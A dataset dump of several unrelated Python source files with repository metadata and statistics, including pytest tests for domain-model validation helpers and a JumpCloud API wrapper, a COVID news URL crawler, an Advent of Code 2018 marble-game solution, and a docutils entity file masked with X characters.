and-kul/catalyst
|
51428d7756e62b9b8ee5379f38e9fd576eeb36e5
|
[
"Apache-2.0"
] | 2
|
2019-04-19T21:34:31.000Z
|
2019-05-02T22:50:25.000Z
|
catalyst/contrib/models/nlp/__init__.py
|
and-kul/catalyst
|
51428d7756e62b9b8ee5379f38e9fd576eeb36e5
|
[
"Apache-2.0"
] | 1
|
2021-01-07T16:13:45.000Z
|
2021-01-21T09:27:54.000Z
|
catalyst/contrib/models/nlp/__init__.py
|
and-kul/catalyst
|
51428d7756e62b9b8ee5379f38e9fd576eeb36e5
|
[
"Apache-2.0"
] | 1
|
2020-12-02T18:42:31.000Z
|
2020-12-02T18:42:31.000Z
|
# flake8: noqa
from catalyst.contrib.models.nlp.encoders import *
from catalyst.contrib.models.nlp.classification import BertClassifier
| 27.4
| 69
| 0.832117
| 17
| 137
| 6.705882
| 0.647059
| 0.210526
| 0.333333
| 0.438596
| 0.491228
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008
| 0.087591
| 137
| 4
| 70
| 34.25
| 0.904
| 0.087591
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
3af69acfc20c476a8d19b9ab5edbc1c708c9fb3f
| 40
|
py
|
Python
|
tests/testimport.py
|
sglumac/pyislands
|
a5eaceb68a0f21bd8bc8586fdf8cf0d9b7a0134f
|
[
"MIT"
] | null | null | null |
tests/testimport.py
|
sglumac/pyislands
|
a5eaceb68a0f21bd8bc8586fdf8cf0d9b7a0134f
|
[
"MIT"
] | null | null | null |
tests/testimport.py
|
sglumac/pyislands
|
a5eaceb68a0f21bd8bc8586fdf8cf0d9b7a0134f
|
[
"MIT"
] | null | null | null |
def test_import():
import pyislands
| 13.333333
| 20
| 0.725
| 5
| 40
| 5.6
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 40
| 2
| 21
| 20
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 1
| 0
| 1.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
aaf4166637d18349fdba991f2bc8623269a574c9
| 8,324
|
py
|
Python
|
tests/test_misc_test_utils.py
|
CuriBio/misc-test-utils
|
276eec2d74cf8f7cd699092b4f93644e9325965f
|
[
"MIT"
] | null | null | null |
tests/test_misc_test_utils.py
|
CuriBio/misc-test-utils
|
276eec2d74cf8f7cd699092b4f93644e9325965f
|
[
"MIT"
] | 23
|
2020-08-15T00:41:17.000Z
|
2022-03-30T12:03:08.000Z
|
tests/test_misc_test_utils.py
|
CuriBio/misc-test-utils
|
276eec2d74cf8f7cd699092b4f93644e9325965f
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import uuid
import domain_model
from domain_model import DomainModel
from domain_model import DomainModelWithUuid
from misc_test_utils import copy_dict_with_key_removed
from misc_test_utils import domain_model_validate_internals_test
from misc_test_utils import domain_model_validation_test
from misc_test_utils import misc_test_utils
import pytest
def test_copy_dict_with_key_removed__creates_copy_of_dict():
test_dict = {"key1": 1, "key2": 2}
actual = copy_dict_with_key_removed(test_dict)
assert actual == test_dict
assert actual is not test_dict
def test_copy_dict_with_key_removed__removes_key_if_specified():
test_dict = {"key1": 1, "key2": 2}
actual = copy_dict_with_key_removed(test_dict, key_to_remove="key2")
assert actual == {"key1": 1}
def test_domain_model_validation_test__creates_DomainModel_object(mocker):
mocked_init = mocker.patch.object(
domain_model.DomainModel, "__init__", autospec=True, return_value=None
)
domain_model_validation_test(DomainModel)
mocked_init.assert_called_once()
def test_domain_model_validation_test__calls_validate_with_no_expected_error(mocker):
mocked_validate = mocker.patch.object(
domain_model.DomainModelWithUuid, "validate", autospec=True
)
test_uuid = uuid.UUID("abc8a386-b6e0-47ed-a752-f2721545f3c6")
domain_model_validation_test(DomainModelWithUuid, "uuid", test_uuid)
mocked_validate.assert_called_once()
def test_domain_model_validation_test__calls_validate_with_no_expected_error__and_uuid_passed_as_additional_kwarg(
mocker,
):
mocked_validate = mocker.patch.object(
domain_model.DomainModelWithUuid, "validate", autospec=True
)
test_uuid = uuid.UUID("abc8a386-b6e0-47ed-a752-f2721545f3c6")
domain_model_validation_test(
DomainModelWithUuid, additional_kwargs={"uuid": test_uuid}
)
mocked_validate.assert_called_once()
def test_domain_model_validation_test__catches_error(mocker):
spied_raises = mocker.spy(misc_test_utils.pytest, "raises")
expected_error = ValueError()
mocker.patch.object(
domain_model.DomainModelWithUuid,
"validate",
autospec=True,
side_effect=expected_error,
)
test_uuid = uuid.UUID("abc8a386-b6e0-47ed-a752-f2721545f3c6")
domain_model_validation_test(
DomainModelWithUuid, "uuid", test_uuid, expected_error=ValueError
)
spied_raises.assert_called_once()
def test_domain_model_validation_test__catches_error_with_text(mocker):
spied_raises = mocker.spy(misc_test_utils.pytest, "raises")
expected_text = "test"
expected_error = ValueError(expected_text)
mocker.patch.object(
domain_model.DomainModelWithUuid,
"validate",
autospec=True,
side_effect=expected_error,
)
test_uuid = uuid.UUID("abc8a386-b6e0-47ed-a752-f2721545f3c6")
domain_model_validation_test(
DomainModelWithUuid,
"uuid",
test_uuid,
expected_error=ValueError,
expected_texts_in_error=expected_text,
)
spied_raises.assert_called_once()
def test_domain_model_validation_test__raises_assertion_error_if_single_expected_text_is_not_in_expected_error(
mocker,
):
expected_text = "test"
expected_error = ValueError()
mocker.patch.object(
domain_model.DomainModelWithUuid,
"validate",
autospec=True,
side_effect=expected_error,
)
test_uuid = uuid.UUID("abc8a386-b6e0-47ed-a752-f2721545f3c6")
with pytest.raises(AssertionError):
domain_model_validation_test(
DomainModelWithUuid,
"uuid",
test_uuid,
expected_error=ValueError,
expected_texts_in_error=expected_text,
)
def test_domain_model_validation_test__raises_assertion_error_if_one_of_multiple_expected_texts_not_in_expected_error(
mocker,
):
expected_texts = ["test1", "test2"]
expected_error = ValueError("test1")
mocker.patch.object(
domain_model.DomainModelWithUuid,
"validate",
autospec=True,
side_effect=expected_error,
)
test_uuid = uuid.UUID("abc8a386-b6e0-47ed-a752-f2721545f3c6")
with pytest.raises(AssertionError):
domain_model_validation_test(
DomainModelWithUuid,
"uuid",
test_uuid,
expected_error=ValueError,
expected_texts_in_error=expected_texts,
)
def test_domain_model_validate_internals_test__creates_DomainModel_object(mocker):
mocked_init = mocker.patch.object(
domain_model.DomainModel, "__init__", autospec=True, return_value=None
)
domain_model_validate_internals_test(DomainModel)
mocked_init.assert_called_once()
def test_domain_model_validate_internals_test__calls_validate_with_no_expected_error(
mocker,
):
mocked_validate = mocker.patch.object(
domain_model.DomainModelWithUuid, "validate_internals", autospec=True
)
test_uuid = uuid.UUID("abc8a386-b6e0-47ed-a752-f2721545f3c6")
domain_model_validate_internals_test(DomainModelWithUuid, "uuid", test_uuid)
mocked_validate.assert_called_once()
def test_domain_model_validate_internals_test__calls_validate_with_no_expected_error__and_uuid_passed_as_additional_kwarg(
mocker,
):
mocked_validate = mocker.patch.object(
domain_model.DomainModelWithUuid, "validate_internals", autospec=True
)
test_uuid = uuid.UUID("abc8a386-b6e0-47ed-a752-f2721545f3c6")
domain_model_validate_internals_test(
DomainModelWithUuid, additional_kwargs={"uuid": test_uuid}
)
mocked_validate.assert_called_once()
def test_domain_model_validate_internals_test__catches_error(mocker):
spied_raises = mocker.spy(misc_test_utils.pytest, "raises")
expected_error = ValueError()
mocker.patch.object(
domain_model.DomainModelWithUuid,
"validate_internals",
autospec=True,
side_effect=expected_error,
)
test_uuid = uuid.UUID("abc8a386-b6e0-47ed-a752-f2721545f3c6")
domain_model_validate_internals_test(
DomainModelWithUuid, "uuid", test_uuid, expected_error=ValueError
)
spied_raises.assert_called_once()
def test_domain_model_validate_internals_test__catches_error_with_text(mocker):
spied_raises = mocker.spy(misc_test_utils.pytest, "raises")
expected_text = "test"
expected_error = ValueError(expected_text)
mocker.patch.object(
domain_model.DomainModelWithUuid,
"validate_internals",
autospec=True,
side_effect=expected_error,
)
test_uuid = uuid.UUID("abc8a386-b6e0-47ed-a752-f2721545f3c6")
domain_model_validate_internals_test(
DomainModelWithUuid,
"uuid",
test_uuid,
expected_error=ValueError,
expected_texts_in_error=expected_text,
)
spied_raises.assert_called_once()
def test_domain_model_validate_internals_test__raises_assertion_error_if_single_expected_text_is_not_in_expected_error(
mocker,
):
expected_text = "test"
expected_error = ValueError()
mocker.patch.object(
domain_model.DomainModelWithUuid,
"validate_internals",
autospec=True,
side_effect=expected_error,
)
test_uuid = uuid.UUID("abc8a386-b6e0-47ed-a752-f2721545f3c6")
with pytest.raises(AssertionError):
domain_model_validate_internals_test(
DomainModelWithUuid,
"uuid",
test_uuid,
expected_error=ValueError,
expected_texts_in_error=expected_text,
)
def test_domain_model_validate_internals_test__raises_assertion_error_if_one_of_multiple_expected_texts_not_in_expected_error(
mocker,
):
expected_texts = ["test1", "test2"]
expected_error = ValueError("test1")
mocker.patch.object(
domain_model.DomainModelWithUuid,
"validate_internals",
autospec=True,
side_effect=expected_error,
)
test_uuid = uuid.UUID("abc8a386-b6e0-47ed-a752-f2721545f3c6")
with pytest.raises(AssertionError):
domain_model_validate_internals_test(
DomainModelWithUuid,
"uuid",
test_uuid,
expected_error=ValueError,
expected_texts_in_error=expected_texts,
)
| 33.429719
| 126
| 0.735704
| 953
| 8,324
| 5.943337
| 0.086044
| 0.091278
| 0.064972
| 0.074153
| 0.952507
| 0.938559
| 0.928143
| 0.899718
| 0.899718
| 0.899718
| 0
| 0.038104
| 0.186569
| 8,324
| 248
| 127
| 33.564516
| 0.798405
| 0.002523
| 0
| 0.728972
| 0
| 0
| 0.089869
| 0.052042
| 0
| 0
| 0
| 0
| 0.098131
| 1
| 0.074766
| false
| 0.009346
| 0.042056
| 0
| 0.116822
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c923ca4bb935bd96e10f420bc13c389130821a98
| 164
|
py
|
Python
|
src/wandb_allennlp/versioned.py
|
mfa/wandb-allennlp
|
29ebba81cdbd83653350d00911c4a54d8da9def1
|
[
"MIT"
] | 22
|
2020-03-28T10:28:26.000Z
|
2022-02-17T12:31:17.000Z
|
src/wandb_allennlp/versioned.py
|
mfa/wandb-allennlp
|
29ebba81cdbd83653350d00911c4a54d8da9def1
|
[
"MIT"
] | 14
|
2020-03-21T17:04:40.000Z
|
2021-09-27T10:11:19.000Z
|
src/wandb_allennlp/versioned.py
|
mfa/wandb-allennlp
|
29ebba81cdbd83653350d00911c4a54d8da9def1
|
[
"MIT"
] | 4
|
2020-04-18T10:33:34.000Z
|
2021-02-02T11:57:28.000Z
|
import allennlp
if int(allennlp.version._MAJOR) >= 1:
from allennlp.__main__ import run as allennlp_run
else:
from allennlp.run import run as allennlp_run
| 23.428571
| 53
| 0.768293
| 25
| 164
| 4.76
| 0.48
| 0.277311
| 0.184874
| 0.319328
| 0.369748
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007353
| 0.170732
| 164
| 6
| 54
| 27.333333
| 0.867647
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
6e5cc99026b3a3933c01856815ccfff6104b13d0
| 2,943
|
py
|
Python
|
crawler/url_crawler.py
|
ltthacker/bdi_final
|
d2758cc00670d0f2eae3f468f36731a25e9a30bc
|
[
"MIT"
] | null | null | null |
crawler/url_crawler.py
|
ltthacker/bdi_final
|
d2758cc00670d0f2eae3f468f36731a25e9a30bc
|
[
"MIT"
] | null | null | null |
crawler/url_crawler.py
|
ltthacker/bdi_final
|
d2758cc00670d0f2eae3f468f36731a25e9a30bc
|
[
"MIT"
] | null | null | null |
from . import util
import random
class URLCrawlerBaomoi:
done = []
queue = []
start_urls = []
def __init__(self):
self.set_start_urls()
self.browser = util.Browser()
def set_start_urls(self):
for i in range(1, 2):
url = 'https://baomoi.com/phong-chong-dich-covid-19/top/328/trang{}.epi'.format(i)
self.start_urls.append(url)
self.queue.append(url)
def crawl(self):
for _ in self.crawl_start_urls_child():
yield _
for _ in self.crawl_child():
yield _
def crawl_start_urls_child(self):
for url in self.start_urls:
for href in util.get_href(self.browser, url):
if href not in self.done:
if href not in self.queue:
self.queue.append(href)
yield url, href
def crawl_child(self):
while 1:
# shuffle the queue to get more diverse content
# since the first 500 x number of start page all from
# baomoi.com front page
random.shuffle(self.queue)
# pop the news
url = self.queue.pop(0)
for href in util.get_href(self.browser, url, keyword='covid'):
if href not in self.done:
if href not in self.queue:
self.queue.append(href)
yield url, href
self.done.append(url)
class URLCrawlerNcov:
done = []
queue = []
start_urls = []
def __init__(self):
self.set_start_urls()
self.browser = util.Browser()
def set_start_urls(self):
for i in range(1, 2):
url = 'https://ncov.moh.gov.vn/dong-thoi-gian'
self.start_urls.append(url)
self.queue.append(url)
self.start_urls.append(url)
def crawl(self):
for _ in self.crawl_start_urls_child():
yield _
for _ in self.crawl_child():
yield _
def crawl_start_urls_child(self):
for url in self.start_urls:
for href in util.get_href(self.browser, url):
if href not in self.done:
if href not in self.queue:
self.queue.append(href)
yield url, href
def crawl_child(self):
while 1:
# shuffle the queue to get more diverse content
# since the first 500 x number of start page all from
# baomoi.com front page
random.shuffle(self.queue)
# pop the news
url = self.queue.pop(0)
for href in util.get_href(self.browser, url, keyword='covid'):
if href not in self.done:
if href not in self.queue:
self.queue.append(href)
yield url, href
self.done.append(url)
| 30.030612
| 94
| 0.526673
| 372
| 2,943
| 4.02957
| 0.19086
| 0.09006
| 0.048032
| 0.058706
| 0.905937
| 0.897265
| 0.897265
| 0.897265
| 0.897265
| 0.8499
| 0
| 0.010532
| 0.38702
| 2,943
| 97
| 95
| 30.340206
| 0.820399
| 0.090724
| 0
| 0.915493
| 0
| 0.014085
| 0.042011
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.140845
| false
| 0
| 0.028169
| 0
| 0.28169
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6e8e96a15717abdceb21d12b5e7170ef234fdfb0
| 5,343
|
py
|
Python
|
tests/test_jc_api_v1.py
|
thomasyu888/jccli
|
ad6d127f6cc3ee660740b57e1450e34e3eedd10f
|
[
"Apache-2.0"
] | 1
|
2020-05-13T18:52:06.000Z
|
2020-05-13T18:52:06.000Z
|
tests/test_jc_api_v1.py
|
thomasyu888/jccli
|
ad6d127f6cc3ee660740b57e1450e34e3eedd10f
|
[
"Apache-2.0"
] | null | null | null |
tests/test_jc_api_v1.py
|
thomasyu888/jccli
|
ad6d127f6cc3ee660740b57e1450e34e3eedd10f
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
.. currentmodule:: test_jc_api_v1
.. moduleauthor:: zaro0508 <zaro0508@gmail.com>
This is the test module for the project's JC API V1 module.
"""
# fmt: off
import pytest
import jcapiv1
# fmt: on
from mock import MagicMock, patch, sentinel
from jccli.jc_api_v1 import JumpcloudApiV1
from jccli.errors import SystemUserNotFoundError
class TestJcApiV1:
def setup_method(self, test_method):
pass
def teardown_method(self, test_method):
pass
@patch.object(JumpcloudApiV1,'get_users')
def test_get_user_id(self, mock_get_users):
response = [
{'account_locked': False,
'activated': False,
'addresses': [],
'allow_public_key': True,
'attributes': [{'name': 'nick', 'value': 'jcman'}],
'bad_login_attempts': 0,
'company': None,
'cost_center': None,
'created': '2019-11-05T01:42:36.652Z',
'department': None,
'description': None,
'displayname': None,
'email': 'jc.tester1@sagebase.org',
'employee_identifier': None,
'employee_type': None,
'enable_managed_uid': False,
'enable_user_portal_multifactor': False,
'external_dn': None,
'external_source_type': None,
'externally_managed': False,
'firstname': 'JC',
'_id': '5dc0d38c1e2e5f51f2312948',
'job_title': None,
'lastname': 'Tester1',
'ldap_binding_user': False,
'location': None,
'mfa': {'configured': False, 'exclusion': False, 'exclusion_until': None},
'middlename': None,
'organization': '5a9d7329feb7f81004ecbee4',
'password_expiration_date': None,
'password_expired': False,
'password_never_expires': False,
'passwordless_sudo': False,
'phone_numbers': [],
'public_key': None,
'relationships': [],
'samba_service_user': False,
'ssh_keys': [],
'sudo': False,
'tags': None,
'totp_enabled': False,
'unix_guid': 5109,
'unix_uid': 5109,
'_username': 'jctester1'}
]
api1 = JumpcloudApiV1("1234")
mock_get_users.return_value = response
user_id = api1.get_user_id("jctester1")
assert (
user_id == "5dc0d38c1e2e5f51f2312948"
), "Failed to get the user ID"
@patch.object(JumpcloudApiV1,'get_users')
def test_get_user_id_not_found(self, mock_get_users):
response = [
{'account_locked': False,
'activated': False,
'addresses': [],
'allow_public_key': True,
'attributes': [],
'bad_login_attempts': 0,
'company': None,
'cost_center': None,
'created': '2019-11-05T01:42:36.652Z',
'department': None,
'description': None,
'displayname': None,
'email': 'jc.tester1@sagebase.org',
'employee_identifier': None,
'employee_type': None,
'enable_managed_uid': False,
'enable_user_portal_multifactor': False,
'external_dn': None,
'external_source_type': None,
'externally_managed': False,
'firstname': 'JC',
'_id': '5dc0d38c1e2e5f51f2312948',
'job_title': None,
'lastname': 'Tester1',
'ldap_binding_user': False,
'location': None,
'mfa': {'configured': False, 'exclusion': False, 'exclusion_until': None},
'middlename': None,
'organization': '5a9d7329feb7f81004ecbee4',
'password_expiration_date': None,
'password_expired': False,
'password_never_expires': False,
'passwordless_sudo': False,
'phone_numbers': [],
'public_key': None,
'relationships': [],
'samba_service_user': False,
'ssh_keys': [],
'sudo': False,
'tags': None,
'totp_enabled': False,
'unix_guid': 5109,
'unix_uid': 5109,
'_username': 'jctester1'}
]
api1 = JumpcloudApiV1("1234")
mock_get_users.return_value = response
user_id = api1.get_user_id("foo")
assert (
user_id == None
), "User ID should be none"
@patch.object(jcapiv1.SystemusersApi,'systemusers_delete')
@patch.object(JumpcloudApiV1,'get_user_id')
def test_delete_user(self, mock_get_user_id, mock_systemusers_delete):
mock_get_user_id.return_value = "1234"
api1 = JumpcloudApiV1("1234")
api1.delete_user("foo")
@patch.object(jcapiv1.SystemusersApi,'systemusers_delete')
@patch.object(JumpcloudApiV1,'get_user_id')
def test_delete_user_no_id(self, mock_get_user_id, mock_systemusers_delete):
mock_get_user_id.return_value = None
api1 = JumpcloudApiV1("1234")
with pytest.raises(SystemUserNotFoundError):
api1.delete_user("foo")
| 35.151316
| 87
| 0.551001
| 503
| 5,343
| 5.568588
| 0.308151
| 0.034273
| 0.032131
| 0.039986
| 0.794716
| 0.777579
| 0.777579
| 0.777579
| 0.777579
| 0.777579
| 0
| 0.051782
| 0.327719
| 5,343
| 151
| 88
| 35.384106
| 0.728007
| 0.037806
| 0
| 0.80916
| 0
| 0
| 0.304678
| 0.071345
| 0
| 0
| 0
| 0
| 0.015267
| 1
| 0.045802
| false
| 0.076336
| 0.038168
| 0
| 0.091603
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
6e97500709dbab16fb378ce004ba82cf90635cf4
| 3,625
|
py
|
Python
|
2018/day_09/python/day09.py
|
josephroquedev/advent-of-code
|
bb217deb7a5f5ed5c8c04cb726ddadb5b042ee4d
|
[
"MIT"
] | null | null | null |
2018/day_09/python/day09.py
|
josephroquedev/advent-of-code
|
bb217deb7a5f5ed5c8c04cb726ddadb5b042ee4d
|
[
"MIT"
] | 2
|
2021-06-02T00:41:38.000Z
|
2021-11-30T10:05:29.000Z
|
2018/day_09/python/day09.py
|
autoreleasefool/advent-of-code
|
bb217deb7a5f5ed5c8c04cb726ddadb5b042ee4d
|
[
"MIT"
] | null | null | null |
from aoc import AOC
from collections import defaultdict
aoc = AOC(year=2018, day=9)
data = aoc.load()
## Part 1
class Marble:
def __init__(self, value):
self.value = value
self.clockwise = None
self.counterclockwise = None
def __repr__(self):
return "{}, ({}, {})".format(
self.value, self.clockwise.value, self.counterclockwise.value
)
def remove_marble(marble):
removed = marble
for _ in range(7):
removed = removed.counterclockwise
counterclockwise = removed.counterclockwise
removed.clockwise.counterclockwise = counterclockwise
counterclockwise.clockwise = removed.clockwise
return removed, removed.clockwise
players, last_marble_points = data.numbers_by_line()[0]
player_points = defaultdict(int)
current_player = 0
highest_marble_placed = 0
current_marble = Marble(0)
current_marble.clockwise = current_marble
current_marble.counterclockwise = current_marble
marbles = {0: current_marble}
while highest_marble_placed < last_marble_points:
marble_to_place = Marble(highest_marble_placed + 1)
if marble_to_place.value % 23 == 0:
player_points[current_player] += marble_to_place.value
removed_marble, next_marble = remove_marble(current_marble)
player_points[current_player] += removed_marble.value
current_marble = next_marble
else:
marbles[marble_to_place.value] = marble_to_place
marble_to_place.clockwise = current_marble.clockwise.clockwise
marble_to_place.counterclockwise = current_marble.clockwise
current_marble.clockwise.clockwise.counterclockwise = marble_to_place
current_marble.clockwise.clockwise = marble_to_place
current_marble = marble_to_place
current_player = (current_player + 1) % players
highest_marble_placed += 1
aoc.p1(max(player_points.values()))
## Part 2
class Marble:
def __init__(self, value):
self.value = value
self.clockwise = None
self.counterclockwise = None
def __repr__(self):
return "{}, ({}, {})".format(
self.value, self.clockwise.value, self.counterclockwise.value
)
def remove_marble(marble):
removed = marble
for _ in range(7):
removed = removed.counterclockwise
counterclockwise = removed.counterclockwise
removed.clockwise.counterclockwise = counterclockwise
counterclockwise.clockwise = removed.clockwise
return removed, removed.clockwise
players, last_marble_points = data.numbers_by_line()[0]
last_marble_points = last_marble_points * 100
player_points = defaultdict(int)
current_player = 0
highest_marble_placed = 0
current_marble = Marble(0)
current_marble.clockwise = current_marble
current_marble.counterclockwise = current_marble
while highest_marble_placed < last_marble_points:
marble_to_place = Marble(highest_marble_placed + 1)
if marble_to_place.value % 23 == 0:
player_points[current_player] += marble_to_place.value
removed_marble, next_marble = remove_marble(current_marble)
player_points[current_player] += removed_marble.value
current_marble = next_marble
else:
marble_to_place.clockwise = current_marble.clockwise.clockwise
marble_to_place.counterclockwise = current_marble.clockwise
current_marble.clockwise.clockwise.counterclockwise = marble_to_place
current_marble.clockwise.clockwise = marble_to_place
current_marble = marble_to_place
current_player = (current_player + 1) % players
highest_marble_placed += 1
aoc.p2(max(player_points.values()))
| 30.208333
| 77
| 0.731034
| 422
| 3,625
| 5.945498
| 0.135071
| 0.129534
| 0.093264
| 0.074133
| 0.914707
| 0.914707
| 0.914707
| 0.914707
| 0.914707
| 0.914707
| 0
| 0.011921
| 0.190069
| 3,625
| 119
| 78
| 30.462185
| 0.842643
| 0.003586
| 0
| 0.873563
| 0
| 0
| 0.006654
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.022989
| 0.022989
| 0.16092
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
42dd51dd201e9ad841926ba555c96e43c365fba3
| 2,880
|
py
|
Python
|
venv/Lib/site-packages/docutils/parsers/rst/include/isogrk3.txt.py
|
roshanba/mangal
|
f7b428811dc07214009cc33f0beb665ead402038
|
[
"bzip2-1.0.6",
"MIT"
] | null | null | null |
venv/Lib/site-packages/docutils/parsers/rst/include/isogrk3.txt.py
|
roshanba/mangal
|
f7b428811dc07214009cc33f0beb665ead402038
|
[
"bzip2-1.0.6",
"MIT"
] | null | null | null |
venv/Lib/site-packages/docutils/parsers/rst/include/isogrk3.txt.py
|
roshanba/mangal
|
f7b428811dc07214009cc33f0beb665ead402038
|
[
"bzip2-1.0.6",
"MIT"
] | null | null | null |
XX XXXX XXXX XXXX XXX XXXX XXXXXX XX XXX XXXXXX XXXXXXX
XX XXXXXXX XXXX XXX XXXXXXX XXXXXXXXX XXXXXXXX XXXXXXXXX XXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX XX XXXXXXXXXXXXXXXXXXX XXXX XX XXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXX
XX XXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXX
XX XXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXXX XXXXXX XXXXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXX
XX XXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXX XXXXXXX XXXXXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXX XXXXXXX XXXXXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXXXX
XX XXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXXX XXXXXX XXXXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXX
XX XXXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXX XXXXXXX
XX XXXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXXXX
XX XXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXX
XX XXXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX
XX XXXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXXX XXXXXX XXXXX
XX XXXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXX
XX XXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XX
XX XXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXXX XXXXXX XXXXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXX
XX XXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXXX XXXXXX XXX
XX XXXXX XXXXXXXXX XXXXXXX XX XXXXX XXX XXXXXX
XX XXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXX XXXXXX
XX XXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXX
XX XXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXXX XXXXXX XX
XX XXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XX
XX XXXXX XXXXXXXXX XXXXXXX XX XXXXX XX XXXXXX
XX XXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXXX XXXXXX XXX
XX XXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXX
XX XXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXX
XX XXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXX XXXXXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXXX XXXXXX XXXXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXX
XX XXXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXX XXXXX
XX XXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXXX XXXXXX XXXXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXX
XX XXXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXX
